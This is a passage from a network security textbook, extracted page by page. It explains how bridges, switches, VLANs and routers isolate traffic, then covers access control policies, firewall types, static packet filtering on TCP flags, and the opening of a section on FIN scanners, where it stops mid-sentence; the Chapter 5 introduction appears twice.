bridge needs to pass traffic from \none collision domain to another. \n \nFigure 4.8: A common bridge \nIn our discussion of Ethernet in Chapter 3, we introduced the concept of a data frame and described the \ninformation contained within the frame header. Bridges put this header information to use by monitoring the \nsource and destination MAC address on each frame of data. By monitoring the source address, the bridge learns \nwhere all the network systems are located. It constructs a table, listing which MAC addresses are directly \n" }, { "page_number": 74, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 74\naccessible by each of its ports. It then uses that information to play traffic cop and regulate the flow of data on the \nnetwork. Let’s look at an example. \nA Bridge Example \nLook at the network in Figure 4.9. Betty needs to send data to the server Thoth. Because everyone on the network \nis required to monitor the network, Betty first listens for the transmissions of other stations. If the wire is free, \nBetty will then transmit a frame of data. The bridge is also watching for traffic and will look at the destination \naddress in the header of Betty’s frame. Because the bridge is unsure of which port the system with MAC address \n00C08BBE0052 (Thoth) is connected to, it amplifies the signal and retransmits it out Port B. Note that until now \nthe bridge functionality is very similar to that of a repeater. The bridge does a little extra, however; it has learned \nthat Betty is attached to Port A and creates a table entry with her MAC address. \n \nFigure 4.9: Betty transmits data to the server Thoth by putting Thoth’s MAC address into the destination field \nof the frame. \nWhen Thoth replies to Betty’s request, as shown in Figure 4.10, the bridge will look at the destination address in \nthe frame of data again. This time, however, it finds a match in its table, noting that Betty is also attached to Port \nA. Because it knows Betty can receive this information directly, it drops the frame and blocks it from being \ntransmitted from Port B. The bridge will also make a new table entry for Thoth, recording the MAC address as \nbeing off of Port A. \n \nFigure 4.10: Thoth’s reply to Betty’s message \nFor as long as the bridge remembers each station’s MAC address, all communications between Betty and Thoth \nwill be isolated from Sue and Babylnor. Traffic isolation is a powerful feature, because it means that systems on \nboth sides of the bridge can be carrying on conversations at the same time, effectively doubling the available \nbandwidth. The bridge insures that communications on both sides stay isolated, as if they were not even connected \n" }, { "page_number": 75, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 75\ntogether. Because stations cannot see transmissions on the other side of the bridge, they assume the network is free \nand send their data. \nEach system only needs to contend for bandwidth with systems on its own segment. This means that there is no \nway for a station to have a collision outside of its segment. Thus these segments are referred to as collision \ndomains, as shown in Figure 4.11. Notice that one port on each side of the bridge is part of each collision domain. \nThis is because each of its ports will contend for bandwidth with the systems it is directly connected to. Because \nthe bridge isolates traffic within each collision domain, there is no way for separated systems to collide their \nsignals. The effect is a doubling of potential bandwidth. \n \nFigure 4.11: Two separate collision domains \nAlso notice that splitting the network into two collision domains has increased the security of the network. For \nexample, let’s say that the system named Babylnor becomes compromised. An attacker has gained high-level \naccess to this system and begins capturing network activity in order to look for sensitive information. \nGiven the above network design, Thoth and Betty would be able to carry on a conversation with relative security. \nThe only traffic that will find its way onto Babylnor’s collision domain is broadcast traffic. You may remember \nfrom Chapter 3 that a broadcast frame needs to be delivered to all local systems. For this reason, a bridge will also \nforward broadcast traffic. \nBy using a bridge in this situation, you get a double bonus light. You have not only increased performance, but \nsecurity as well. \nSo what happens when traffic needs to traverse the bridge? As mentioned, when a bridge is unsure of the location \nof a system it will always pass the packet along just in case. Once the bridge learns that the system is in fact \nlocated off of its other port, it will continue to pass the frame along as required. \nIf Betty begins communicating with Sue, for example, this data will cross the bridge and be transmitted onto the \nsame collision domain as Babylnor. This means that Babylnor is capable of capturing this data stream. While the \nbridge helped to secure Betty’s communications with Thoth, it provides no additional security when Betty begins \ncommunicating with Sue. \nIn order to secure both of these sessions, you would need a bridge capable of dedicating a single port to each \nsystem. This type of functionality is provided in a device referred to as a switch. \nSwitches \nSwitches are the marriage of hub and bridge technology. They resemble hubs in appearance, having multiple RJ45 \nconnectors for connecting network systems. Instead of being a dumb amplifier like a hub, however, a switch \nfunctions as though it has a little miniature bridge built into each port. A switch will keep track of the MAC \naddresses attached to each of its ports and route traffic destined for a certain address only to the port to which it is \nattached. \nFigure 4.12 shows a switched environment in which each device is connected to a dedicated port. The switch will \nlearn the MAC identification of each station once a single frame transmission occurs (identical to a bridge). \n" }, { "page_number": 76, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 76\nAssuming that this has already happened, you now find that at exactly the same instant Station 1 needs to send \ndata to Server 1, Station 2 needs to send data to Server 2, and Station 3 needs to send data to Server 3. \n \nFigure 4.12: A switch installation showing three workstations and three servers that need to communicate \nThere are some interesting things about this situation. The first is that each wire run involves only the switch and \nthe station attached to it. This means that each collision domain is limited to only these two devices, because each \nport of the switch is acting like a bridge. The only traffic seen by the workstations and servers is any frame \nspecifically sent to them or to the broadcast address. As a result, all three stations will see very little network \ntraffic and will be able to transmit immediately. This is a powerful feature that goes a long way toward increasing \npotential bandwidth. Given our example, if this is a 10Mbps topology, the effective throughput has just increased \nby a factor of 3. This is because all three sets of systems can carry on their conversations simultaneously, as the \nswitch isolates them from each other. While it is still technically 10Mbps Ethernet, potential throughput has \nincreased to 30Mbps. \nBesides increasing performance dramatically, you have also increased security. If any one of these systems \nbecomes compromised, the only sessions that can be monitored are sessions with the compromised system. For \nexample, if an attacker gains access to Server 2, she will not be able to monitor communication sessions with \nServers 1 or 3, only Server 2. \nThis is because monitoring devices can only collect traffic that is transmitting within their collision domain. Since \nServer 2’s collision domain consists of itself and the switch port it is connected to, the switch does an effective job \nof isolating System 2 from the communication sessions being held with the other servers. \nWhile this is a wonderful security feature, it does make legitimate monitoring of your network somewhat \ncumbersome. This is why many switches include a monitoring port. \nA monitoring port is simply a port on the switch that can be configured to receive a copy of all data transmitted to \none or more ports. For example, you could plug your analyzer into port 10 of the switch and configure the device \nto listen to all traffic on port 3. If port 3 is one of your servers, you can now analyze all traffic flowing to and from \nthis system. \nThis can also be a potential security hole. If an attacker is able to gain administrative access to the switch (through \ntelnet, HTTP, SNMP, or the console port), she would have free rein to monitor any system connected to, or \ncommunicating through, the switch. To return to our example, if the attacker could access Server 2 and the switch \nitself, she is now in a perfect position to monitor all network communications. \nNote \nKeep in mind that bridges, switches, and similar networking devices are designed \nprimarily to improve network performance, not to improve security. Increased security is \njust a secondary benefit. This means that they have not received the same type of abusive, \nreal-world testing as, say, a firewall or router product. A switch can augment your \nsecurity policy, but it should not be the core device to implement it. \nVLAN Technology \nSwitching introduces a new technology referred to as the virtual local area network (VLAN). Software running on \nthe switch allows you to set up connectivity parameters for connected systems by workgroup (referred to as \nVLAN groups) instead of by geographical location. The switch’s administrator is allowed to organize port \ntransmissions logically so that connectivity is grouped according to each user’s requirements. The “virtual” part is \nthat these VLAN groups can span over multiple physical network segments, as well as multiple switches. By \n" }, { "page_number": 77, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 77\nassigning all switch ports that connect to PCs used by accounting personnel to the same VLAN group, you can \ncreate a virtual accounting network. \nThink of VLANs as being the virtual equivalent of taking an ax to a switch with many ports in order to create \nmultiple switches. If you have a 24-port switch and you divide the ports equally into three separate VLANs, you \nessentially have three 8-port switches. \n“Essentially” is the key word here, as you still have one physical device. While this makes for simpler \nadministration, from a security perspective it is not nearly as good as having three physical switches. If an attacker \nis able to compromise a switch using VLANs, he might be able to configure his connection to monitor any of the \nother VLANs on the device. \nThis can be an extremely bad thing if you have one large switch providing connectivity on both sides of a traffic-\ncontrol device such as a firewall. An attacker may not need to penetrate your firewall—he may find the switch to \nbe a far easier target. At the very least, the attacker now has two potential ways into the network instead of just \none. \nRouters \nA router is a multiport device that decides how to handle the contents of a frame, based on protocol and network \ninformation. To truly understand what this means, we must first look at what a protocol is and how it works. \nUntil now, we’ve been happily communicating using the Media Access Control address assigned to our \nnetworking devices. Our systems have used this number to contact other systems and transmit information as \nrequired. \nThe problem with this scheme is that it does not scale very well. For example, what if you have 2,000 systems that \nneed to communicate with each other? You would now have 2,000 systems fighting each other for bandwidth on a \nsingle Ethernet network. Even if you employ switching, the number of broadcast frames will eventually reach a \npoint where network performance will degrade and you cannot add any more systems. This is where protocols \nsuch as IP and IPX come in. \nNetwork Protocols \nAt its lowest levels, a network protocol is a set of communication rules that provide the means for networking \nsystems to be grouped by geographical area and common wiring. To indicate it is part of a specific group, each of \nthese systems is assigned an identical protocol network address. \nNetwork addresses are kind of like zip codes. Let’s assume someone mails a letter and the front of the envelope \nsimply reads: Fritz & Wren, 7 Spring Road. If this happens in a very small town, the letter will probably get \nthrough (as if you’d used a MAC address on a LAN). \nIf the letter were mailed in a city like Boston or New York, however, the Post Office would have no clue where to \nsend it (although postal workers would probably get a good laugh). Without a zip code, they may not even attempt \ndelivery. The zip code provides a way to specify the general area where this letter needs to be delivered. The \npostal worker processing the letter is not required to know exactly where Spring Road is located. She simply looks \nat the zip code and forwards the letter to the Post Office responsible for this code. It is up to the local Post Office \nto know the location of Spring Road and to use this knowledge to deliver the letter. \nProtocol network addresses operate in a similar fashion. A protocol-aware device will add the network address of \nthe destination device to the data field of a frame. It will also record its own network address, in case the remote \nsystem needs to send a reply. \nThis is where a router comes in. A router is a protocol-aware device that maintains a table of all known networks. \nIt uses this table to help forward information to its final destination. Let’s walk through an example to see how a \nrouted network operates. \nA Routed Network Example \nLet’s assume you have a network similar to that shown in Figure 4.13 and that System B needs to transmit \ninformation to System F. \n" }, { "page_number": 78, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 78\n \nFigure 4.13: An example of a routed network \nSystem B will begin by comparing its network address to that of System F. If there is a match, System B will \nassume the system is local and attempt to deliver the information directly. If the network addresses are different \n(as they are in our example), System B will refer to its routing table. If it does not have a specific entry for \nNetwork 3, it will fall back on its default router, which in this case is Tardis. In order to deliver the information to \nTardis, System B would ARP for Tardis’s MAC address. \nSystem B would then add the network protocol delivery information for System F (the source and destination \nnetwork numbers) to the data and create a frame using Tardis’s MAC address as the destination. It does this \nbecause System B assumes that Tardis will take care of forwarding the information to the destination network. \nOnce Tardis receives the frame, it performs a CRC check to insure the integrity of the data. If the frame checks \nout, Tardis will then completely strip off the header and trailer. Tardis then analyzes the destination network \naddress listed in the frame (in this case Network 3) to see if it is locally connected to this network. Since Tardis is \nnot directly connected to Network 3, it consults its routing table in order to find the best route to get there. Tardis \nthen discovers that Galifrey is capable of reaching Network 3. \nTardis now ARPs to discover the local MAC address being used by Galifrey. Tardis then creates a new frame \naround the data packet by creating a header consisting of its MAC address to the source address field and \nGalifrey’s MAC address in the destination field. Finally, Tardis generates a new CRC value for the trailer. \nWhile all this stripping and recreating seems like a lot of work, it is a necessary part of this type of \ncommunication. Remember that routers are placed at the borders of a network segment. The CRC check is \nperformed to insure that bad frames are not propagated throughout the network. The header information is stripped \naway because it is only applicable on Network 1. When Tardis goes to transmit the frame on Network 2, the \noriginal source and destination MAC addresses have no meaning. This is why Tardis must replace these values \nwith ones that are valid for Network 2. \nBecause the majority of the header (12 of the 14 bytes) needs to be replaced anyway, it is easier to simply strip the \nheader completely away and create it from scratch. As for stripping off the trailer, once the source and destination \nMAC addresses change, the original CRC value is no longer valid. This is why the router must strip it off and \ncreate a new one. \nNote \nA data field that contains protocol information is referred to as a packet. While this term \nis sometimes used interchangeably with the term frame, a packet in fact only describes a \nportion of a frame. \nSo Tardis has created a new frame around the packet and is ready to transmit it. Tardis will now transmit the frame \nout onto Network 2 so that the frame will be received by Galifrey. Galifrey receives the frame and processes it in a \nsimilar fashion to Tardis. It checks the CRC and strips off the header and trailer. \nAt this point, however, Galifrey realizes that it has a local connection to System F, because they are both \nconnected to Network 3. Galifrey builds a new frame around the packet and, instead of needing to reference a \ntable, it simply delivers the frame directly. \nProtocol Specificity \nIn order for a router to provide this type of functionality, it needs to understand the rules for the protocol being \nused. This means that a router is protocol specific. Unlike a bridge, which will handle any valid topology traffic \nyou throw at it, a router has to be specifically designed to support both the topology and the protocol being used. \nFor example, if your network contains Banyan Vines systems, make sure that your router supports VinesIP. \n" }, { "page_number": 79, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 79\nRouters can be a powerful tool for controlling the flow of traffic on your network. If you have a network segment \nthat is using IPX and IP but only IP is approved for use on the company backbone, simply enable IP support only \non your router. The router will ignore any IPX traffic it receives. \nA wonderful feature of routers is their ability to block broadcasts. (As I mentioned in Chapter 3, broadcasts are \nframes that contain all Fs for the destination MAC address.) Because any point on the other side of the router is a \nnew network, these frames are blocked. \nNote \nThere is a counterpart to this called an all-networks broadcast that contains all Fs in both \nthe network and MAC address fields. These frames are used to broadcast to local \nnetworks when the network address is not known. Most routers will still block these all-\nnetworks broadcasts by default. \nMost routers also have the ability to filter out certain traffic. For example, let’s say your company enters a \npartnership with another organization. You need to access services on this new network but do not want to allow \nyour partner to access your servers. To accomplish this, simply install a router between the two networks and \nconfigure it to filter out any communication sessions originating from the other organization’s network. \nMost routers use static packet filtering to control traffic flow. The specifics of how this works will be covered in \nChapter 6. For now, just keep in mind that routers cannot provide the same level of traffic control that may be \nfound in the average firewall. Still, if your security requirements are minimal, packet filtering may be a good \nchoice—chances are you will need a router to connect your networks, anyway. \nA Comparison of Bridging/Switching and Routing \nTable 4.1 represents a summary of the information discussed in the preceding sections. It provides a quick \nreference to the differences between controlling traffic at the datalink layer (bridges and switches) and controlling \ntraffic at the network layer (routers). \nTable 4.1: Bridging/Switching versus Routing \nA Bridge (Switch): \nA \nRouter: \nUses the same network address off all ports \nUses \ndifferen\nt \nnetwork \naddres\nses off \nall ports \nBuilds tables based on MAC address \nBuilds \ntables \nbased \non \nnetwork \naddres\ns \nFilters traffic based on MAC information \nFilters \ntraffic \nbased \non \nnetwork \nor host \ninforma\ntion \nForwards broadcast traffic \nBlocks \nbroadc\nast \ntraffic \nForwards traffic to unknown addresses \nBlocks \ntraffic \nto \nunknow\nn \n" }, { "page_number": 80, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 80\nTable 4.1: Bridging/Switching versus Routing \nA Bridge (Switch): \nA \nRouter: \naddres\nses \nDoes not modify frame \nCreates \na new \nheader \nand \ntrailer \nCan forward traffic based on the frame header \nMust \nalways \nqueue \ntraffic \nbefore \nforward\ning \nLayer-3 Switching \nNow that you have a clear understanding of the differences between a switch and a router, let’s look at a \ntechnology that, on the surface, appears to mesh the two. Layer-3 switching, switch routing, and router switching \nall are used interchangeably to describe the same devices. \nSo what exactly is a switch router? The device is not quite as revolutionary as you might think. In fact, these \ndevices are more an evolution of existing router technology. The association with the word “switch” is more for \nmarketing appeal to emphasize the increase in raw throughput these devices can provide. \nThese devices typically (but not always) perform the same functions as a standard router. When a frame of data is \nreceived, it is buffered into memory and a CRC check is performed. Then, the topology frame is stripped off the \ndata packet. Just like a regular router, a switch router will reference its routing table to determine the best route of \ndelivery, repackage the data packet into a frame, and send it on its merry way. \nHow does a switch router differ from a standard router? The answer lies under the hood of the device. Processing \nis provided by application-specific integrated circuit (ASIC) hardware. With a standard router, all processing was \ntypically performed by a single RISC (Reduced Instruction Set Computer) processor. In a switch router, \ncomponents are dedicated to performing specific tasks within the routing process. The result is a dramatic increase \nin throughput. \nKeep in mind that the real goal of these devices is to pass information along faster than the standard router. In \norder to accomplish this, a vendor may choose to do things slightly differently than the average router \nimplementation in order to increase throughput (after all, raw throughput is everything, right?). For example, a \nspecific vendor implementation may not buffer inbound traffic in order to perform a CRC check on the frame. \nOnce enough of the frame has been read in order to make a routing decision, the device may immediately begin \ntransmitting information out the other end. \nFrom a security perspective, this may not always be a good thing. Certainly performance is a concern—but not at \nthe cost of accidentally passing traffic that should have been blocked. Since the real goal of a switch router is \nperformance, it may not be as nitpicky as the typical router about what it passes along. \nLayer-3 switching has some growing up to do before it can be considered a viable replacement for the time-tested \nrouter. Most modern routers have progressed to the point where they are capable of processing more than one \nmillion packets per second. Typically, higher traffic rates are required only on a network backbone. To date, this is \nwhy switches have dominated this area of the network. \nSwitch routing may make good security sense as a replacement for regular switches, however. The ability to \nsegregate traffic into true subnets instead of just collision domains brings a whole new level of control to this area \nof the network. \nLike their router counterparts, some switch routers support access control lists, which allow the network \nadministrator to manipulate which systems can communicate between each of the subnets and what services they \n" }, { "page_number": 81, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 81\ncan access. This is a much higher level of granular control than is provided with a regular switch. Switch routing \ncan help to fortify the security of your internal network without the typical degradation in performance. If your \nsecurity requirements are light, a switch router may be just the thing to augment your security policy. \nNote \nWe will look at some examples of implementing an access control list (ACL) on a Cisco \nrouter in Chapter 6. \n \nSummary \nWe’ve covered a lot of ground in this chapter. We discussed the basics of communication \nproperties and looked at transmission media and hardware from a security perspective. We \nalso discussed what traffic control options are available with typical network hardware. \nIn the next few chapters, we’ll look at systems that are specifically designed to implement \nsecurity policies. We will start by discussing firewalls and then work our way into intrusion-\ndetection systems. \nChapter 5: Firewalls \nIn this chapter, we will discuss firewalls and their implementation. Not all firewalls operate in the \nsame way, so you should select a firewall based upon the security it provides, while insuring that it \nis a proper fit for your business requirements. For example, if the firewall you chose will not support \nAOL’s Instant Messenger and IM is a critical business function, it may have been cheaper to simply \nbuy a pair of wire cutters. Before we discuss firewalls, we will review what information you need to \ncollect in order to make an informed purchase decision. \nDefining an Access Control Policy \nBefore you can choose the type or brand of firewall to purchase, you have to ask yourself a \nvery simple question (one that can be very time consuming to answer): What are (or should \nbe) the rules that deal with the flow of data traffic in and out of your network? The answers to \nthis question will form your access control policy. An access control policy is simply a \ncorporate policy that states which type of access is allowed across an organization’s network \nperimeters. For example, your organization may have a policy that states, “Our internal users \ncan access Internet Web sites and FTP sites or send SMTP mail, but we will only allow \ninbound SMTP mail from the Internet to our internal network.” \nAn access control policy may also apply to different areas within an internal network. For \nexample, your organization may have WAN links to supporting business partners. In this case, \nyou might want to define a limited scope of access across this link to insure that it is only used \nfor its intended purpose. \nAn access control policy simply defines the directions of data flow to and from different parts \nof the network. It will also specify what type of traffic is acceptable, assuming that all other \ndata types will be blocked. When defining an access control policy, you can use a number of \ndifferent parameters to describe traffic flow. Some common descriptors that can be \nimplemented with a firewall are listed in Table 5.1. \nTip \nIf you do not have an access control policy, you should create one. A clearly \ndefined access control policy helps to insure that you select the correct firewall \nproduct or products. There is nothing worse than spending $10,000 on new firewall \nsoftware, only to find it does not do everything you need it to. \nTable 5.1: Access Control Descriptors \nDescription \nDefinition \nDirection \nA description of acceptable traffic flow based on direction. For example, \ntraffic from the Internet to the internal network (inbound) or traffic from \nthe internal network heading towards the Internet (outbound). \nService \nThe type of server application that will be accessed. For example, Web \naccess (HTTP), File Transfer Protocol (FTP), Simple Mail Transfer \nProtocol (SMTP). \n" }, { "page_number": 82, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 82\nTable 5.1: Access Control Descriptors \nDescription \nDefinition \nSpecific Host \nSometimes more granularity is required than simply specifying \ndirection. For example, an organization may wish to allow inbound \nHTTP access, but to only a specific computer. Conversely, the \norganization may only have one business unit to which it wishes to \ngrant Internet Web server access. \nIndividual \nUsers \nMany organizations have a business need to let certain individuals \nperform specific activities but do not want to open up this type of \naccess to everyone. For example, the company CFO may need to be \nable to access internal resources from the Internet because she does a \nlot of traveling. In this case, the device enforcing the access control \npolicy would attempt to authenticate anyone trying to gain access, to \ninsure that only the CFO can get through. \nTime of Day \nSometimes an organization may wish to restrict access during certain \nhours of the day. For example, an access control policy may state, \n“Internal users can access Web servers on the Internet only between \nthe hours of 5:00 PM and 7:00 AM.” \nPublic or \nPrivate \nAt times it may be beneficial to use a public network (such as Frame \nRelay or the Internet) to transmit private data. An access control policy \nmay define that one or more types of information should be encrypted \nas that information passes between two specific hosts or over entire \nnetwork segments. \nQuality of \nService \nAn organization may wish to restrict access based on the amount of \navailable bandwidth. For example, let’s assume that an organization \nhas a Web server that is accessible from the Internet and wants to \ninsure that access to this system is always responsive. The \norganization may have an access control policy that allows internal \nusers to access the Internet at a restricted level of bandwidth when a \npotential client is currently accessing the Web server. When the client is \ndone accessing the server, the internal users would have 100 percent \nof the bandwidth available to access Internet resources. \nRole \nSimilar to restricting access to individual users, administrators use roles \nto group individuals with similar access needs. This grouping simplifies \nthe complexity of access control and eases administrative workloads. \nBe creative and try to envision what type of access control your organization may require in \nthe future. This will help to insure that you will not quickly outgrow your firewall solution. I have \nhad quite a few organizations tell me that they had zero interest in accessing their local \nnetwork from the Internet. Many of these same clients came back within six months, looking \nfor an Internet-based remote access solution. Always try to think in scale—not just according \nto today’s requirements. \n \n \nChapter 5: Firewalls \nIn this chapter, we will discuss firewalls and their implementation. Not all firewalls operate in the \nsame way, so you should select a firewall based upon the security it provides, while insuring that it \nis a proper fit for your business requirements. For example, if the firewall you chose will not support \nAOL’s Instant Messenger and IM is a critical business function, it may have been cheaper to simply \nbuy a pair of wire cutters. Before we discuss firewalls, we will review what information you need to \ncollect in order to make an informed purchase decision. \n" }, { "page_number": 83, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 83\nDefining an Access Control Policy \nBefore you can choose the type or brand of firewall to purchase, you have to ask yourself a \nvery simple question (one that can be very time consuming to answer): What are (or should \nbe) the rules that deal with the flow of data traffic in and out of your network? The answers to \nthis question will form your access control policy. An access control policy is simply a \ncorporate policy that states which type of access is allowed across an organization’s network \nperimeters. For example, your organization may have a policy that states, “Our internal users \ncan access Internet Web sites and FTP sites or send SMTP mail, but we will only allow \ninbound SMTP mail from the Internet to our internal network.” \nAn access control policy may also apply to different areas within an internal network. For \nexample, your organization may have WAN links to supporting business partners. In this case, \nyou might want to define a limited scope of access across this link to insure that it is only used \nfor its intended purpose. \nAn access control policy simply defines the directions of data flow to and from different parts \nof the network. It will also specify what type of traffic is acceptable, assuming that all other \ndata types will be blocked. When defining an access control policy, you can use a number of \ndifferent parameters to describe traffic flow. Some common descriptors that can be \nimplemented with a firewall are listed in Table 5.1. \nTip \nIf you do not have an access control policy, you should create one. A clearly \ndefined access control policy helps to insure that you select the correct firewall \nproduct or products. There is nothing worse than spending $10,000 on new firewall \nsoftware, only to find it does not do everything you need it to. \nTable 5.1: Access Control Descriptors \nDescription \nDefinition \nDirection \nA description of acceptable traffic flow based on direction. For example, \ntraffic from the Internet to the internal network (inbound) or traffic from the \ninternal network heading towards the Internet (outbound). \nService \nThe type of server application that will be accessed. For example, Web \naccess (HTTP), File Transfer Protocol (FTP), Simple Mail Transfer Protocol \n(SMTP). \nSpecific \nHost \nSometimes more granularity is required than simply specifying direction. \nFor example, an organization may wish to allow inbound HTTP access, but \nto only a specific computer. Conversely, the organization may only have \none business unit to which it wishes to grant Internet Web server access. \nIndividual \nUsers \nMany organizations have a business need to let certain individuals perform \nspecific activities but do not want to open up this type of access to \neveryone. For example, the company CFO may need to be able to access \ninternal resources from the Internet because she does a lot of traveling. In \nthis case, the device enforcing the access control policy would attempt to \nauthenticate anyone trying to gain access, to insure that only the CFO can \nget through. \nTime of \nDay \nSometimes an organization may wish to restrict access during certain \nhours of the day. For example, an access control policy may state, “Internal \nusers can access Web servers on the Internet only between the hours of \n5:00 PM and 7:00 AM.” \nPublic or \nPrivate \nAt times it may be beneficial to use a public network (such as Frame Relay \nor the Internet) to transmit private data. An access control policy may \ndefine that one or more types of information should be encrypted as that \ninformation passes between two specific hosts or over entire network \nsegments. \nQuality of \nService \nAn organization may wish to restrict access based on the amount of \navailable bandwidth. For example, let’s assume that an organization has a \nWeb server that is accessible from the Internet and wants to insure that \naccess to this system is always responsive. The organization may have an \naccess control policy that allows internal users to access the Internet at a \nrestricted level of bandwidth when a potential client is currently accessing \n" }, { "page_number": 84, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 84\nTable 5.1: Access Control Descriptors \nDescription \nDefinition \nthe Web server. When the client is done accessing the server, the internal \nusers would have 100 percent of the bandwidth available to access \nInternet resources. \nRole \nSimilar to restricting access to individual users, administrators use roles to \ngroup individuals with similar access needs. This grouping simplifies the \ncomplexity of access control and eases administrative workloads. \nBe creative and try to envision what type of access control your organization may require in \nthe future. This will help to insure that you will not quickly outgrow your firewall solution. I have \nhad quite a few organizations tell me that they had zero interest in accessing their local \nnetwork from the Internet. Many of these same clients came back within six months, looking \nfor an Internet-based remote access solution. Always try to think in scale—not just according \nto today’s requirements. \n \nDefinition of a Firewall \nA firewall (unlike a simple router that merely directs network traffic) is a system or group of systems that enforces \nan access control policy on network traffic as it passes through access points. Once you have determined the levels \nof connectivity you wish to provide, it is the firewall’s job to insure that no additional access beyond this scope is \nallowed. It is up to your firewall to insure that your access control policy is followed by all users on the network. \nFirewalls are similar to other network devices in that their purpose is to control the flow of traffic. Unlike other \nnetwork devices, however, a firewall must control this traffic while taking into account that not all the packets of \ndata it sees may be what they appear to be. \nFor example, a bridge filters traffic based on the destination MAC address. If a host incorrectly labels the \ndestination MAC address and the bridge inadvertently passes the packet to the wrong destination, the bridge is not \nseen as being faulty or inadequate. It is expected that the host will follow certain network rules, and if it fails to \nfollow these rules, then the host is at fault, not the bridge. \nA firewall, however, must assume that hosts may try to fool it in order to sneak information past it. A firewall \ncannot use communication rules as a crutch; rather, it should expect that the rules will not be followed. This places \na lot of pressure on the firewall design, which must plan for every contingency. \nWhen Is a Firewall Required? \nTypically, access is controlled between the internal network and the Internet, but there are many other situations in \nwhich a firewall may be required. \nDial-In Modem Pool \nA firewall can be used to control access from a dial-in modem pool. For example, an organization may have an \naccess control policy that specifies that dial-in users may only access a single mail system. The organization does \nnot want to allow access to other internal servers or to the Internet. A firewall can be used to implement this \npolicy. \nExternal Connections to Business Partners \nMany organizations have permanent connections to remote business partners. This can create a difficult \nsituation—the connection is required for business, but now someone has access to the internal network from an \narea where security is not controlled by the organization. A firewall can be used to regulate and document access \nfrom these links. \n" }, { "page_number": 85, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 85\nBetween Departments \nSome organizations (such as trading companies) are required to maintain internal firewalls between different areas \nof the network. This is to ensure that internal users only have access to the information they require. A firewall at \nthe point of connection between these two networks enforces access control. \n \nFirewall Types \nNot all firewalls are built the same. A number of different technologies have been employed in order to control \naccess across a network perimeter. The most popular are \nƒ Static packet filtering \nƒ Dynamic packet filtering \nƒ Stateful filtering \nƒ Proxy \nStatic Packet Filtering \nStatic packet filtering controls traffic by using information stored within the packet headers. As packets are \nreceived by the filtering device, the attributes of the data stored within the packet headers are compared against the \naccess control policy (referred to as an access control list or ACL). Depending on how this header information \ncompares to the ACL, the traffic is either allowed to pass or dropped. \nA static packet filter can use the following information when regulating traffic flow: \nƒ \nDestination IP address or subnet \nƒ \nSource IP address or subnet \nƒ \nDestination service port \nƒ \nSource service port \nƒ \nFlag (TCP only) \nThe TCP Flag Field \nWhen the TCP transport is used, static packet filtering can use the flag field in the TCP header when making \ntraffic control decisions. Figure 5.1 shows a packet decode of a TCP/IP packet. The Control Bits field identifies \nwhich flags have been set. Flags can be either turned on (binary value of 1) or turned off (binary value of 0). \n \nFigure 5.1: A TCP/IP packet decode \nSo what does the flag field tell us? You may remember from our discussion of the TCP three-packet handshake in \nChapter 3 that different flag values are used to identify different aspects of a communication session. The flag \n" }, { "page_number": 86, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 86\nfield gives the recipient hosts some additional information regarding the data the packet is carrying. Table 5.2 lists \nthe valid flags and their uses. \nTable 5.2: Valid TCP/IP Flags \nTCP Flag \nFlag Description \nACK (Acknowledgement) \nIndicates that this data is a response to a data request and \nthat there is useful information within the Acknowledgment \nNumber field. \nFIN (Final) \nIndicates that the transmitting system wishes to terminate \nthe current session. Typically, each system in a \ncommunication session issues a FIN before the connection \nis actually closed. \nPSH (Push) \nPrevents the transmitting system from queuing data prior to \ntransmission. In many cases it is more efficient to let a \ntransmitting system queue small chunks of data prior to \ntransmission so that fewer packets are created. On the \nreceiving side, Push tells the remote system not to queue \nthe data, but to immediately push the information to the \nupper protocol levels. \nRST (Reset) \nResets the state of a current communication session. \nReset is used when a non-recoverable transmission failure \noccurs. It is a transmitting system’s way of stating, “Were \nyou listening to me? Do I have to say it again?” This is \ntypically caused by a non-responsive host or by a spouse \nenthralled by an afternoon sporting event. \nSYN (Synchronize) \nUsed while initializing a communication session. This flag \nshould not be set during any other portion of the \ncommunication process. \nURG (Urgent) \nIndicates that the transmitting system has some high-\npriority information to pass along and that there is useful \ninformation within the Urgent Pointer field. When a system \nreceives a packet with the Urgent flag set, it processes the \ninformation before any other data that may be waiting in \nqueue. This is referred to as processing the data out-of-\nband. \nThe flag field plays an important part in helping a static packet filter regulate traffic. This is because a firewall is \nrarely told to block all traffic originating off of a specific port or going to a particular host. \nFor example, you may have an access control policy that states, “Our internal users can access any service out on \nthe Internet, but all Internet traffic headed to the internal network should be blocked.” While this sounds like the \nACL should be blocking all traffic coming from the Internet, this is in fact not the case. \nRemember that all communications represent a two-step process. When you access a Web site, you make a data \nrequest (step 1) to which the Web site replies by returning the data you requested (step 2). This means that during \nstep 2 you are expecting data to be returned from the Internet-based host to the internal system. If the second half \nof our statement were taken verbatim (“…all Internet traffic headed to the internal network should be blocked.”), \nour replies would never make it back to the requesting host. We are back to the “wire cutters as an effective \nsecurity device” model: our firewall would not allow a complete communication session. \nThis is where our flag field comes into play. Remember that during the TCP three-packet handshake, the \noriginating system issues a packet with SYN=1 and all other flags equal to 0. The only time this sequence is true is \nwhen one system wishes to establish a connection to another. A packet filter will use this unique flag setting in \norder to control TCP sessions. By blocking the initial connection request, a data session between the two systems \ncannot be established. \nSo to make our access control policy more technically correct, we would state, “all Internet traffic headed to the \ninternal network with SYN=1 and all other flags equal to 0 should be blocked.” This means that any other flag \nsequence is assumed to be part of a previously established connection and would be allowed to pass through. \n" }, { "page_number": 87, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 87\nThis is clearly not the most secure method of locking down your network perimeter. By playing with the flag \nvalues, a would-be attacker can fool a static packet filter into allowing malicious traffic through. In this way, these \npredators stay one step ahead of these security devices. \nFIN Scanners \nBecause a simple packet filter is capable of blocking port scans, some people decided to become creative. The \nsimple port scanner eventually evolved into the FIN scanner. A FIN scanner operates under a similar principle to \nthe port scanner, except that the transmitted packets have FIN=1, ACK=1 and 